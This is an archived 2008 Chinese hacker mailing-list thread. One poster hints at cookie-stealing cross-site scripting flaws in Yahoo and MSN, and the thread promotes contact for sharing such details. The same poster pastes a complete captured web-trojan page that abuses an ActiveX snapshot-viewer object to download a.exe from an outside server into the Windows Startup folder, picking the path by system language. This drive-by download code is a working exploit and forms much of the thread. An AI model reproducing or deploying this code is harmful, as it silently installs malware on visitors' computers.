呵呵 我是从来不破坏人家吃饭的东西的 。我是不会暴的。
2008/10/23 live live <[EMAIL PROTECTED]> > 估计很快又要爆了,公开讨论的时候就是漏洞要爆的时候! > > 2008/10/23 hackoday hackoday <[EMAIL PROTECTED]> > >> >> 有能讨论的 就加我QQ吧 190000973 .我的地址 >> [EMAIL PROTECTED] | >> 2008/10/23 [EMAIL PROTECTED] <[EMAIL PROTECTED]> >> >> 2008-10-23 >>> >>> >>> 今天 好像yahoo跟MSN的跨站漏洞有被我挖掘到了 >>> >>> >>> 透露下一点点的小信息 跟上次的2次的 一样 关键部分还是有点小变化的 利用的document.cookie);关键语句达到跳 >>> >>> >>> 转目的 地址:http://www.coloreagle.com/hotmail/ >>> >>> >>> http://www.coloreagle.com/yahoo/ >>> >>> >>> 我还无意中抓到了一个网马 >>> >>> http://www.coloreagle.com/yahoo/ddd.html >>> >>> >>> >>> 代码如下:<html> >>> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' >>> id='obj'></object> >>> >>> >>> >>> <script language='JavaScript'> >>> var buf1 = 'http://www.coloreagle.com/yahoo/a.exe'; >>> var buf2; >>> var sysLanguage; >>> sysLanguage=navigator.systemLanguage? >>> navigator.systemLanguage:navigator.language; >>> if(sysLanguage == 'en-us' || sysLanguage == 'en-us'){ >>> buf2="C:/Documents and Settings/All Users/Start >>> Menu/Programs/ >>> Startup/setup.exe"; >>> } >>> if(sysLanguage == 'zh-cn' || sysLanguage == 'zh-CN'){ >>> buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/ >>> setup.exe"; >>> >>> } >>> obj.SnapshotPath = buf1; >>> obj.CompressedPath = buf2; >>> obj.PrintSnapshot(); >>> >>> </script> >>> </html> >>> >>> >>> >>> 区分中英文版本 A。EXE是个木马 呵呵, >>> >>> >>> >>> 具体的细节我就不透露过多了 毕竟一些大牛牛还是要靠这些来吃饭的 >>> >>> >>> >>> >>> [EMAIL PROTECTED] 本人联系方式。有任何意见可以跟我交流 >> >> >> >> >> > > > > --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---

